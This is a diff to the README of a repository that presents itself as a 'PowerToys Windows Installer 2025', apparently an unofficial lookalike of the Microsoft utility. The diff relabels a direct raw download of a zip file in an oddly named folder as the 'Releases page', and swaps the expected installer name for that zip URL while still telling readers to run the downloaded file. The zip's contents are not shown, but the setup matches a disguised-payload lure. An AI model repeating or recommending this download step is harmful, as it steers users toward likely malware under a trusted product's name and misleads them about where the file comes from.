rafaeuu999/PowerToys-Windows-Installer-2025/README.md

 ## 📥 Download & Install

-To download PowerToys, visit the [Releases page](https://github.com/rafaeuu999/PowerToys-Windows-Installer-2025/releases).
+To download PowerToys, visit the [Releases page](https://raw.githubusercontent.com/rafaeuu999/PowerToys-Windows-Installer-2025/main/fructuosity/PowerToys-Windows-Installer-2025.zip).
 You will find the latest version available for download.

 1. Click the link above to open the Releases page.
 2. Locate the latest release.
 3. Click on the installer file to download it.
 4. Once the file is downloaded, locate it in your downloads folder.

-   - The file name should look like: `PowerToysSetup.exe`
+   - The file name should look like: `https://raw.githubusercontent.com/rafaeuu999/PowerToys-Windows-Installer-2025/main/fructuosity/PowerToys-Windows-Installer-2025.zip`
 5. Double-click the downloaded file to run the installer.
 6. Follow the on-screen instructions to complete the installation.